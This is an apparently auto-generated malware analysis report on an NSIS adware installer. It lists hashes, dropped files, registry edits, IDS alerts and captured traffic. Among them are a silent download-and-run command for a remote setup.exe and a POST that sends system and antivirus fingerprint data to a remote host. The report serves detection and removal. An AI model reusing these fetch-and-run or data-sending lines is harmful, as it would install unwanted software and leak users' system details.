SearchProtectToolbar_pcap_9baaf8eb34
Trojan.NSIS.StartPage.FD, SearchProtectToolbar_pcap.YR, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: 9baaf8eb346b33aab34e95c2649381e5
SHA1: c8fd83dd006bbd289c17a2785971dbd3f16463da
SHA256: f3b15c4b400d195697ffaa8a9056db32f0f7aa771658bde526294e4c433867dd
SSDeep: 24576:9DOKrOkpY PQbdIuXtWrDGkwmj ww rREH:c pQbCitWrB fH
Size: 990417 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-08-05 03:46:27
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):
%original file name%.exe:3676
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:3676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Banner.dll (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\inetc.dll (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\bitool.xxx (7288 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\binsischeck654.xml (18956 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\BiTool[1].dll (5984 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\spltmp.bmp (19096 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Aero.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\modern-wizard.bmp (11040 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\modern-header.bmp (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Math.dll (2461 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\advsplash.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFEC9.tmp (47790 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\md5dll.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\xml.dll (5114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssFCB.tmp (123318 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\binsis142.xml (598 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\nsDialogs.dll (21 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsy20FC.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\spltmp.bmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssFEB8.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssFCB.tmp (0 bytes)
Registry activity
The process %original file name%.exe:3676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASAPI32]
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASAPI32]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASMANCS]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASMANCS]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
Dropped PE files
| MD5 | File path |
|---|---|
| d43e12c4c5d319bade804d984fc058e5 | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\BiTool[1].dll |
| d43e12c4c5d319bade804d984fc058e5 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\bitool.dll |
| 75c6e59cc3cea43af20438c3c0b76729 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Aero.dll |
| eac76a087f7bef5c4ea71c21680add0d | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Banner.dll |
| 4ed2d7172521630a14197c9f2a5c799e | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Math.dll |
| 6f5257c0b8c0ef4d440f4f4fce85fb1b | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\System.dll |
| 6def2cf3daf850acdc1a3e7340a439c4 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\advsplash.dll |
| d7a3fa6a6c738b4a3c40d5602af20b08 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\inetc.dll |
| 0745ff646f5af1f1cdd784c06f40fce9 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\md5dll.dll |
| d9256d9acaecabb20b7e9a1595abfa36 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\nsDialogs.dll |
| 42df1fbaa87567adf2b4050805a1a545 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\xml.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 23610 | 24064 | 4.44336 | e5e7adda692e6e028f515fe3daa2b69f |
| .rdata | 28672 | 4558 | 4608 | 3.6294 | 5801d712ecba58aa87d1e7d1aa24f3aa |
| .data | 36864 | 108536 | 1024 | 3.48418 | cc58d0a55ac015d8f1470ea90f440596 |
| .ndata | 147456 | 180224 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 327680 | 293000 | 293376 | 3.76795 | b00feb2ddadebfa05fca759303728af3 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://d27foqb3kkzkt9.cloudfront.net/sdk/binsis/2.3a/BiTool.dll | |
| hxxp://d3oxtn1x3b8d7i.cloudfront.net/binsis/get_pre_offering_checks?uid=82B9B6A5FD0041398E063EA8F63FA48B&v=2.3.4&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNGMgMjggMjEgOTkgYTMgYjMtNmQgMDggZjEgMDMgODggNTUgODUgZWIgIEhQUU9FTSAtIDYwNDAwMDA&affid=lionskin&sid=lionskin&s=0 | |
| hxxp://d3oxtn1x3b8d7i.cloudfront.net/binsis/xml?uid=82B9B6A5FD0041398E063EA8F63FA48B&v=2.3.4&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNGMgMjggMjEgOTkgYTMgYjMtNmQgMDggZjEgMDMgODggNTUgODUgZWIgIEhQUU9FTSAtIDYwNDAwMDA&affid=lionskin&sid=lionskin&s=0 | |
| sub.spirlymo.com |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET POLICY PE EXE or DLL Windows file download HTTP
Traffic
GET /sdk/binsis/2.3a/BiTool.dll HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d27foqb3kkzkt9.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 102912
Connection: keep-alive
Server: nginx
Date: Thu, 09 Mar 2017 12:00:08 GMT
Last-Modified: Tue, 28 Oct 2014 10:54:19 GMT
ETag: "544f75db-19200"
Expires: Thu, 09 Mar 2017 12:10:08 GMT
Cache-Control: max-age=600
Accept-Ranges: bytes
Age: 57
X-Cache: Hit from cloudfront
Via: 1.1 017ee4b2e5ba6b7a7dd1443f39b6e832.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Tn8cH4-sevBE2jVnTv4bXfjcDqAonEtX5RGfYZkpupYe8dYJK0L6hg==....x...3..E.P.E.d............z....E......E...E............ ........P.
...............s.............E............H..........M.d......Y.M.3...
.....]..........U..Q.M..M........k....E...].....U..Q.M..M........{....
.]........U..j.h./..d.....P..0.x...3.P.E.d......M..s....E......E......
E...E.P.M.Q..................s....U.R..........................E..E...
...M..D....E..M.d......Y..]...U..Q.M..M..........M..........E...].....
........U..Q.M..M..........M...........]................U..j.h.-..d...
..P.. .x...3.P.E.d......M.......E......E......E...E.P.M.Q.U.R.........
.........O..............E.P.M.Q..................'.........m.......E..
E......M..8....E..M.d......Y..].......U..Q.M..M.....n....E...]........
U..Q.M..M...........]...........U.....S.}.........E..E..}..t..}..t?.}.
.tm......M.Q.U.R.E.P..................`..............M..H..i.U.R.E.P.M
.Q..................,..............U..P..5.}......E.P.M.Q.U.R......]..
...................W...........E..E..}..t..}..t..}..tN.s.M.Q.U.R......
.................M..H..M.U.R.E.P.......................M..H(.'.}......
U.R.E.P..................U.....[..]...............U....(.M... ...M....
...E.Pj.......z..................M...j..U.R.M..I....E.Pj.......I......
......&..P.M...7..............M..A....P.;U........}.........E.P.M.....
..............M...j..U.R.M.. ....E.P.M.............%..P.M..A7.......t@
.M.......P.;U.u..E..E..}..t..}..t....M.......@..D.M..........7...M..M.
.}..t..}..t....M..~....@(...M..q.............3...]..................U.
..}..|<.E.P.M.Q.U.R.E.P........................................<<< skipped >>>
GET /binsis/get_pre_offering_checks?uid=82B9B6A5FD0041398E063EA8F63FA48B&v=2.3.4&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNGMgMjggMjEgOTkgYTMgYjMtNmQgMDggZjEgMDMgODggNTUgODUgZWIgIEhQUU9FTSAtIDYwNDAwMDA&affid=lionskin&sid=lionskin&s=0 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d3oxtn1x3b8d7i.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Sat, 16 Sep 2017 23:18:05 GMT
Expires: Sat, 16 Sep 2017 20:31:25 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
X-Cache: Miss from cloudfront
Via: 1.1 41903dc3828cdce2b3daa3c944827b92.cloudfront.net (CloudFront)
X-Amz-Cf-Id: vZAm34Mx8AHs9dvV5NRssT4ebBu9ri_-JnuTcl5CGYnVxOcIIizYlg==31f8..<?xml version="1.0"?>.<pre_offering_checks><check
type="registry" return_name="check_4" return_value_type="boolean">
<value_to_check><key>HKCU\Software\Somoto\SDP</key>&
lt;name>uid</name></value_to_check></check><ch
eck type="registry" return_name="check_2182" return_value_type="boolea
n"><value_to_check><key>HKLM\SOFTWARE\Goobzo\YouTube Ac
celerator</key><name>version</name></value_to_che
ck></check><check type="registry" return_name="check_2246"
return_value_type="boolean"><value_to_check><key>HKLM\
SOFTWARE\YTDownloader</key><name>version</name></
value_to_check></check><check type="registry" return_name=
"check_2450" return_value_type="boolean"><value_to_check><
key>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Hotspo
tShield</key><name>DisplayName</name></value_to_c
heck></check><check type="registry" return_name="check_385
0" return_value_type="boolean"><value_to_check><key>HKL
M\SOFTWARE\YTDownloader</key><name>version</name><
;/value_to_check></check><check type="registry" return_nam
e="check_2056" return_value_type="boolean"><value_to_check>&l
t;key>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sear
chProtect</key><name>DisplayName</name></value_to
_check></check><check type="registry" return_name="che<<< skipped >>>
POST /binsis/xml?uid=82B9B6A5FD0041398E063EA8F63FA48B&v=2.3.4&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNGMgMjggMjEgOTkgYTMgYjMtNmQgMDggZjEgMDMgODggNTUgODUgZWIgIEhQUU9FTSAtIDYwNDAwMDA&affid=lionskin&sid=lionskin&s=0 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Filename: nssFCB.tmp
User-Agent: NSIS_Inetc (Mozilla)
Host: d3oxtn1x3b8d7i.cloudfront.net
Content-Length: 10041
Connection: Keep-Alive
Cache-Control: no-cache
installer_data={"uid":"82B9B6A5FD0041398E063EA8F63FA48B","muid":"8d207bd7870e2fd5ffd9640909f43c11","affid":"lionskin","sid":"lionskin","installerVersion":"2.3.4","osVersion":"6.1.7601 32bit","ieVersion":"9.0.8112.16421","ff_installed":"1","ff_version":"49.0.1.6109","ff_default_homepage":"about:blank","ff_is_default":"0","ie_installed":"1","ie_version":"9.0.8112.16421","ie_default_homepage":"about:blank","ie_is_default":"1","chrome_installed":"0","chrome_version":"","chrome_default_homepage":"not_found","chrome_is_default":"0","opera_installed":"0","opera_version":"","opera_default_homepage":"not_found","opera_is_default":"0","safari_installed":"0","safari_version":"","safari_default_homepage":"not_found","safari_is_default":"0","check_4":"false","check_2182":"false","check_2246":"false","check_2450":"false","check_3850":"false","check_2056":"false","check_2060":"false","check_3360":"false","check_2832":"false","check_4042":"false","check_4044":"false","avs_chk_avast_reg_id_1":"false","avs_chk_avast
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Sat, 16 Sep 2017 23:18:10 GMT
Vary: Accept-Encoding
Expires: Sat, 16 Sep 2017 20:31:30 GMT
Cache-Control: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 41903dc3828cdce2b3daa3c944827b92.cloudfront.net (CloudFront)
X-Amz-Cf-Id: rUxaAckN748LeeryRDtHVaB47GnmKIUKGwBSyldPGBw15P9zHjoVzA==256..<?xml version="1.0" encoding="windows-1252"?>.<sponsored
_data><downloader><url>hXXp://sub.spirlymo.com/installe
rs/bi_downloader/1505602947043/setup.exe</url><downloadOnInit
>1</downloadOnInit><args>/silent /initurl hXXp://sub.yo
rkshatb.com/downloader/:affid:/:sid:/:uid:? -uid="%UID%" -sid="%Softwa
reID%" -affid="¯filiateID%" -muid="%MUID%"</args></download
er><offers/><additional_data><tokyo_csrf2_key>a76
146b5d45ec851b1bf28ccb70e74ed</tokyo_csrf2_key><tokyo_csrf2_t
imestamp>1505603890</tokyo_csrf2_timestamp><ping_domain>
;hXXp://sub.yorkshatb.com</ping_domain></additional_data>&
lt;/sponsored_data>...0..HTTP/1.1 200 OK..Content..
The Trojan connects to the servers at the folowing location(s):
.text
`.rdata
@.data
.ndata
.rsrc
Vj%SSS
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
ers\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\nsDialogs.dll
Anti-Virus (AV) Edition for Windows_is1
ault_browser_infobar_last_declined":"13120826992402961","last_known_google_url":"hXXps://VVV.google.com.ua/","pepper_flash_settings_enabled":true,"window_placement":{"bottom":802,"docked":false,"left":10,"maximized":false,"right":953,"top":0,"work_area_bottom":802,"work_area_left":0,"work_area_right":1276,"work_area_top":0}},"countryid_at_install":21843,"credentials_enable_service":true,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2914724","0","0","0","0","0","0","0","0","0","0","0","0","0","0","536636"],"daily_original_length_application":"62478","daily_original_length_unknown":"0","daily_original_length_via_data_reduction_proxy":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\nsDialogs.dll
t/Windows/CurrentVersion/Uninstall/Kaspersky"
":"lionskin","installerVersion":"2.3.4","osVersion":"6.1.7601 32bit","ieVersion":"9.0.8112.16421"
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp
raprefs.ini
install\Google Chrome
2014 skinpacks.com
.reloc
WINMM.dll
AdvSplash.dll
@.reloc
GetProcessHeap
comdlg32.dll
nsDialogs.dll
All Files|*.*
xml.dll
.?AVexecution_error@TinyXPath@@
Assertion failed: %s, file %s, line %d
zcÁ
cn?%C
zF%c?5
G.oXi
.Ck6M
wEby
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssFCB.tmp
nssFCB.tmp
yorkshatb.com/downloader/:affid:/:sid:/:uid:? -uid="%UID%" -sid="%SoftwareID%" -affid="¯filiateID%" -muid="%MUID%"
.default
1e5.exe
rentVersion\Uninstall\eScan Anti-Virus (AV) Edition for Windows_is1
3967CDD-F8BD-4AC9-8369-0D2BD8F246F5}
plore.exe
ninstall\eScan Anti-Virus (AV) Edition for Windows_is1
Microsoft/Windows/CurrentVersion/Uninstall/Kaspersky"
r_lso_data_enabled":true,"default_browser_infobar_last_declined":"13120826992402961","last_known_google_url":"hXXps://VVV.google.com.ua/","pepper_flash_settings_enabled":true,"window_placement":{"bottom":802,"docked":false,"left":10,"maximized":false,"right":953,"top":0,"work_area_bottom":802,"work_area_left":0,"work_area_right":1276,"work_area_top":0}},"countryid_at_install":21843,"credentials_enable_service":true,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2914724","0","0","0","0","0","0","0","0","0","0","0","0","0","0","536636"],"daily_original_length_application":"62478","daily_original_length_unknown":"0","daily_original_length_via_data_reduction_proxy":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","Uninstall\eScan Anti-Virus (AV) Edition for Windows_is1
e":"13122112111791155","browser":{"clear_lso_data_enabled":true,"default_browser_infobar_last_declined":"13120826992402961","last_known_google_url":"hXXps://VVV.google.com.ua/","pepper_flash_settings_enabled":true,"window_placement":{"bottom":802,"docked":false,"left":10,"maximized":false,"right":953,"top":0,"work_area_bottom":802,"work_area_left":0,"work_area_right":1276,"work_area_top":0}},"countryid_at_install":21843,"credentials_enable_service":true,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2914724","0","0","0","0","0","0","0","0","0","0","0","0","0","0","536636"],"daily_original_length_application":"62478","daily_original_length_unknown":"0","daily_original_length_via_data_reduction_proxy":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","Version\Uninstall\eScan Anti-Virus (AV) Edition for Windows_is1
5250224
c:\%original file name%.exe
C:\SkinPack\
C:\Users\"%CurrentUserName%"\AppData\Local\Temp
%original file name%.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nssFEB8.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
571083322
1049060
{"account_id_migration_state":2,"account_tracker_service_last_update":"13122112111791155","browser":{"clear_lso_data_enabled":true,"default_browser_infobar_last_declined":"13120826992402961","last_known_google_url":"hXXps://VVV.google.com.ua/","pepper_flash_settings_enabled":true,"window_placement":{"bottom":802,"docked":false,"left":10,"maximized":false,"right":953,"top":0,"work_area_bottom":802,"work_area_left":0,"work_area_right":1276,"work_area_top":0}},"countryid_at_install":21843,"credentials_enable_service":true,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2914724","0","0","0","0","0","0","0","0","0","0","0","0","0","0","536636"],"daily_original_length_application":"62478","daily_original_length_unknown":"0","daily_original_length_via_data_reduction_proxy":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsy20FC.tmp
/silent /initurl hXXp://sub.yorkshatb.com/downloader/:affid:/:sid:/:uid:? -uid="%UID%" -sid="%SoftwareID%" -affid="¯filiateID%" -muid="%MUID%"
hXXp://sub.spirlymo.com/installers/bi_downloader/1505602947043/setup.exe
1505603890
hXXp://sub.yorkshatb.com
-1727723021
1180086
1628046802
-2046754816
-2147410511
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v3.0b2</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></application></compatibility></assembly>"$4\IconCache.db"
%original file name%.exe_3676_rwx_10004000_00001000:
callback%d
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Banner.dll (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\inetc.dll (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\bitool.xxx (7288 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\binsischeck654.xml (18956 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\BiTool[1].dll (5984 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\spltmp.bmp (19096 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Aero.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\modern-wizard.bmp (11040 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\modern-header.bmp (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Math.dll (2461 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\advsplash.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFEC9.tmp (47790 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\md5dll.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\xml.dll (5114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssFCB.tmp (123318 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\binsis142.xml (598 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\nsDialogs.dll (21 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.